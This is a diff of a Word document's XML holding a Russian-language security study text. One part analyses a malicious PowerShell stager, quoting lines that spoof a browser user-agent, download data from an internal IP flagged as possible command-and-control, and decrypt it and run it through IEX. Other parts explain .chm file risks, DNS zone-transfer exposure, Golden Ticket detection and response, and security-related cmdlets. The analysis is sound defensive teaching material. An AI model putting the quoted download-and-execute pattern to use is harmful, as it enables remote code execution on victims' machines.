+        <w:t xml:space="preserve">; $u='Mozilla/5.0(Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>like</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Gecko</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>'; $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>WC.Headers.Add</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>('</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>User-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Agent',$u); Создается новый веб-клиент, и добавляется строка user-agent для имитации легитимного веб-браузера. Это обычно используется для избежания обнаружения при выполнении веб-запросов. </w:t>
+        <w:t>Agent</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>',$</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>u</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">); Создается новый веб-клиент, и добавляется строка </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>user-agent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> для имитации легитимного веб-браузера. Это обычно используется для избежания обнаружения при выполнении веб-запросов. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3496,8 +4293,18 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Загрузка данных powershell</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Загрузка данных </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -3510,7 +4317,35 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> $DAtA=$WC.DownloadData($SER+$T); Скрипт создает URL-адрес и загружает с него данные. Похоже, он подключается к локальному IP-адресу (10.6.100.123), что может указывать на сервер управления и контроля или другой вредоносный источник. </w:t>
+        <w:t xml:space="preserve"> $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>DAtA</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>=$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>WC.DownloadData</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">($SER+$T); Скрипт создает URL-адрес и загружает с него данные. Похоже, он подключается к локальному IP-адресу (10.6.100.123), что может указывать на сервер управления и контроля или другой вредоносный источник. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3532,8 +4367,18 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Расшифровка и выполнение данных powershell</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Расшифровка и выполнение данных </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -3546,7 +4391,71 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -join [Char[]](&amp;$R $datA($IV+$K)) | IEX Загруженные данные обрабатываются с помощью пользовательской функции расшифровки ($R) и выполняются с помощью IEX (Invoke-Expression). Это распространенный метод запуска динамически сгенерированных или загруженных скриптов. </w:t>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>join</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Char</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>]](&amp;$R $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>datA</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>($IV+$K)) | IEX Загруженные данные обрабатываются с помощью пользовательской функции расшифровки ($R) и выполняются с помощью IEX (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Invoke-Expression</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">). Это распространенный метод запуска динамически сгенерированных или загруженных скриптов. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3623,7 +4532,21 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>Такое поведение типично для вредоносных программ или других вредоносных скриптов, нацеленных на использование PowerShell для несанкционированных действий.</w:t>
+        <w:t xml:space="preserve">Такое поведение типично для вредоносных программ или других вредоносных скриптов, нацеленных на использование </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> для несанкционированных действий.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3744,20 +4667,44 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Почему файлы с расширением «chm» могут быть опасны?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Файлы с расширением «.chm» (Compiled HTML Help) могут представлять опасность по нескольким причинам:</w:t>
+        <w:t>Почему файлы с расширением «</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>chm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>» могут быть опасны?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Файлы с расширением «.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>chm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>» (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Compiled</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> HTML Help) могут представлять опасность по нескольким причинам:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3792,8 +4739,13 @@
         </w:rPr>
         <w:t>Загрузка внешнего контента</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Они могут ссылаться на внешние ресурсы, что позволяет загружать содержимое с других сайтов, включая потенциально вредоносные файлы.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Они</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> могут ссылаться на внешние ресурсы, что позволяет загружать содержимое с других сайтов, включая потенциально вредоносные файлы.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3893,7 +4845,15 @@
         <w:t>Сбор информации</w:t>
       </w:r>
       <w:r>
-        <w:t>: Злоумышленники могут использовать AXFR-запросы для сбора информации о вашем домене, включая все поддомены, IP-адреса и другие записи. Эта информация может быть использована для планирования атак.</w:t>
+        <w:t xml:space="preserve">: Злоумышленники могут использовать AXFR-запросы для сбора информации о вашем домене, включая все </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>поддомены</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, IP-адреса и другие записи. Эта информация может быть использована для планирования атак.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3911,8 +4871,13 @@
         </w:rPr>
         <w:t>Уязвимости</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Если ваш DNS-сервер неправильно настроен и разрешает AXFR-запросы от неавторизованных IP, это создает уязвимость. Злоумышленник может получить доступ к конфиденциальной информации.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Если</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ваш DNS-сервер неправильно настроен и разрешает AXFR-запросы от неавторизованных IP, это создает уязвимость. Злоумышленник может получить доступ к конфиденциальной информации.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3930,7 +4895,15 @@
         <w:t>Атаки на инфраструктуру</w:t>
       </w:r>
       <w:r>
-        <w:t>: Получив полную зону, злоумышленник может анализировать вашу инфраструктуру, выявлять слабые места и разрабатывать стратегии для дальнейших атак, таких как DDoS или фишинг.</w:t>
+        <w:t xml:space="preserve">: Получив полную зону, злоумышленник может анализировать вашу инфраструктуру, выявлять слабые места и разрабатывать стратегии для дальнейших атак, таких как </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>DDoS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> или фишинг.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3958,7 +4931,31 @@
         <w:t>DNS-сервер</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> не защищен должным образом, что может привести к другим атакам, таким как spoofing или cache poisoning.</w:t>
+        <w:t xml:space="preserve"> не защищен должным образом, что может привести к другим атакам, таким как </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>spoofing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> или </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cache</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>poisoning</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4007,20 +5004,36 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Как обнаружить атаку Golden Ticket?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Атака Golden Ticket — это метод компрометации, используемый злоумышленниками для получения несанкционированного доступа к ресурсам в сети Windows. Вот несколько шагов, которые помогут обнаружить такую атаку:</w:t>
+        <w:t xml:space="preserve">Как обнаружить атаку Golden </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Ticket</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Атака Golden </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Ticket</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> — это метод компрометации, используемый злоумышленниками для получения несанкционированного доступа к ресурсам в сети Windows. Вот несколько шагов, которые помогут обнаружить такую атаку:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4067,8 +5080,16 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Анализ Kerberos</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Анализ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Kerberos</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>: Ищите аномальные запросы на получение билетов (TGT), которые могут указывать на использование поддельных билетов.</w:t>
       </w:r>
@@ -4123,8 +5144,13 @@
         </w:rPr>
         <w:t>Служебные учетные записи</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Обратите внимание на учетные записи, которые не должны использоваться для входа в систему, но активно аутентифицируются.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Обратите</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> внимание на учетные записи, которые не должны использоваться для входа в систему, но активно аутентифицируются.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4158,10 +5184,31 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Конфигурация Kerberos</w:t>
-      </w:r>
-      <w:r>
-        <w:t>: Убедитесь, что настройки Kerberos соответствуют рекомендациям безопасности, и используйте только современные версии протокола.</w:t>
+        <w:t xml:space="preserve">Конфигурация </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Kerberos</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Убедитесь</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, что настройки </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Kerberos</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> соответствуют рекомендациям безопасности, и используйте только современные версии протокола.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4215,7 +5262,23 @@
         <w:t>Инструменты анализа</w:t>
       </w:r>
       <w:r>
-        <w:t>: Используйте инструменты, такие как BloodHound или Mimikatz, чтобы выявить аномалии в доступе и привилегиях.</w:t>
+        <w:t xml:space="preserve">: Используйте инструменты, такие как </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>BloodHound</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> или </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Mimikatz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, чтобы выявить аномалии в доступе и привилегиях.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4251,8 +5314,13 @@
         </w:rPr>
         <w:t>Обучение сотрудников</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Обучите сотрудников распознавать фишинг и другие методы, которые могут быть использованы для получения доступа к учетным записям администраторов.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Обучите</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> сотрудников распознавать фишинг и другие методы, которые могут быть использованы для получения доступа к учетным записям администраторов.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4288,21 +5356,34 @@
         </w:rPr>
         <w:t>Аудит безопасности</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Проводите регулярные аудиты безопасности для выявления и устранения уязвимостей в системе.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Следуя этим шагам, можно повысить вероятность выявления атак Golden Ticket и улучшить общую безопасность сети.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Проводите</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> регулярные аудиты безопасности для выявления и устранения уязвимостей в системе.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Следуя этим шагам, можно повысить вероятность выявления атак Golden </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Ticket</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> и улучшить общую безопасность сети.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4371,8 +5452,13 @@
         </w:rPr>
         <w:t>Изолировать контроллер домена</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Отключите его от сети, чтобы предотвратить дальнейшие атаки и утечки данных.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Отключите</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> его от сети, чтобы предотвратить дальнейшие атаки и утечки данных.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4421,8 +5507,13 @@
         </w:rPr>
         <w:t>Сообщите руководству</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Уведомите руководство и команду по безопасности о произошедшем инциденте.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Уведомите</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> руководство и команду по безопасности о произошедшем инциденте.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4438,8 +5529,13 @@
         </w:rPr>
         <w:t>Уведомите пользователей</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Если необходимо, проинформируйте пользователей о возможных компрометациях их учетных записей.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Если</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> необходимо, проинформируйте пользователей о возможных компрометациях их учетных записей.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4471,8 +5567,13 @@
         </w:rPr>
         <w:t>Анализ журнала событий</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Изучите журналы событий на контроллере домена и других серверах для выявления действий злоумышленника.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Изучите</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> журналы событий на контроллере домена и других серверах для выявления действий злоумышленника.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4488,8 +5589,21 @@
         </w:rPr>
         <w:t>Проверка на вредоносное ПО</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Запустите антивирусные и антималварные сканирования.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Запустите</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> антивирусные и </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>антималварные</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> сканирования.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4530,8 +5644,13 @@
         </w:rPr>
         <w:t>Восстановление из резервной копии</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Если контроллер домена был сильно поврежден, восстановите его из последней надежной резервной копии.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Если</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> контроллер домена был сильно поврежден, восстановите его из последней надежной резервной копии.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4563,8 +5682,13 @@
         </w:rPr>
         <w:t>Обновление системы</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Убедитесь, что все патчи и обновления безопасности установлены.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Убедитесь</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>, что все патчи и обновления безопасности установлены.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4580,16 +5704,29 @@
         </w:rPr>
         <w:t>Пересмотр политик безопасности</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Обновите политики безопасности, включая сложность паролей и двухфакторную аутентификацию.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    Мониторинг: Установите системы мониторинга для обнаружения аномалий в будущем.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Обновите</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> политики безопасности, включая сложность паролей и двухфакторную аутентификацию.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    Мониторинг</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Установите</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> системы мониторинга для обнаружения аномалий в будущем.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4671,8 +5808,13 @@
         </w:rPr>
         <w:t>Проведите аудит безопасности</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Рассмотрите возможность проведения внешнего аудита для оценки текущего уровня безопасности.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Рассмотрите</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> возможность проведения внешнего аудита для оценки текущего уровня безопасности.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4702,7 +5844,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Какая функция PowerShell 5 является лучшей для команды безопасности?</w:t>
+        <w:t xml:space="preserve">Какая функция </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 5 является лучшей для команды безопасности?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4717,9 +5867,11 @@
       <w:r>
         <w:t xml:space="preserve">В </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>PowerShell</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> 5.0 одной из лучших функций для команды безопасности является </w:t>
       </w:r>
@@ -4728,8 +5880,17 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Get-EventLog</w:t>
-      </w:r>
+        <w:t>Get-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>EventLog</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">. Эта команда позволяет администраторам просматривать журналы событий </w:t>
       </w:r>
@@ -4760,8 +5921,17 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Get-Acl</w:t>
-      </w:r>
+        <w:t>Get-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Acl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> – для получения списка прав доступа к файлам и папкам.</w:t>
       </w:r>
@@ -4773,6 +5943,7 @@
       <w:r>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -4780,6 +5951,7 @@
         </w:rPr>
         <w:t>Set-Acl</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> – для изменения прав доступа.</w:t>
       </w:r>
@@ -4796,8 +5968,17 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Get-WinEvent</w:t>
-      </w:r>
+        <w:t>Get-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>WinEvent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> – для работы с более современными журналами событий, позволяя фильтровать и анализировать события.</w:t>
       </w:r>
@@ -4809,12 +5990,21 @@
       <w:r>
